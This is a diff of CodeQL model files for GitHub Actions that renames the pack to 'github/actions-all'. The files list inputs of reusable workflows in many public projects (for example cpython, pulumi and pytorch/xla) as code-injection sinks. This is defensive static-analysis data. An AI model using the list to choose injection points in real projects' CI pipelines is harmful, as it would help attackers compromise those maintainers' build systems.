--- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 56b2ef6691e4..011787908473 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 7bc952a84834..9593323f325a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 1c0663dd01c6..7901da27836d 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 4da8f3276622..ccb1bd246546 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4e8adfafe3c2..8317fdabab05 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 28cb702ce13c..529e1576e748 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index cb315ee4328c..d659fbc8089a 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 956c4cba9669..9ca03d9aee1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index 804c1bdae4e2..725487f10050 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index 78d91b2afb5f..2bda8bb60a53 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 31cadc3ff179..e91b615cbe64 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 11362fda1e55..e09e461e605e 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index 131cff3e92a8..f8dd54aee14d 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index acc5bf51e357..c4aaa28f00b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index c89d1c808c30..546dac977a80 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 0258c79e83f6..3a072fd9f07c 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index ebeba1eb2268..08a5f8fc58ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 5f709385839a..299c70daa54a 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e96dbba0699d..3e03b65cb8b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 2a7a9afd5a68..20eb977b973a 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5094422f3fed..4e58b2fa38cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index dff837456454..6935bc7788d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 88b68dc4ea7f..94d733fa0c4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 18c6974c74f4..6b1214886fe4 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index 561c3e15e641..4a97c50ad6e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index 961741f413f3..a6e4c3473f26 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index 985652a265b6..be72ba183574 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 3103913ab4f9..5f4a4a09cd00 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index b89c1307d2d4..4cadb751d755 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index 9e60cc61bb56..1257c67c1807 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index cac4e298538b..f0daee8757ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index eb2669a96ead..85d3b564a78c 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 590e518d3508..01bda56c9a9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index d55af595b1cb..4c9e9b1dc8fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 1fd6cd394bcc..30e54f94fc17 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index 3583052045b8..bb0c172bf0e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index f355ceee6da2..3a5ad21b22af 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 2b9190c87af8..c161072bd3d8 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index 783ff3c04682..0362312f27a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index de853d30588b..2ae5aab3b2cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index 31f09278ecd3..e2c8ae625c20 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index d45a2e2a03a0..13461b602054 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 896400bf2f15..88e02dd04c45 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index ade06c90c26b..2f368497f013 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index f4c2d488ba37..64f3c2085402 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 8a11ced42d02..9c2d7a421db8 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 4c018b20f223..1410fd6fbe98 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 315c85efeb62..eca441b608a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml 
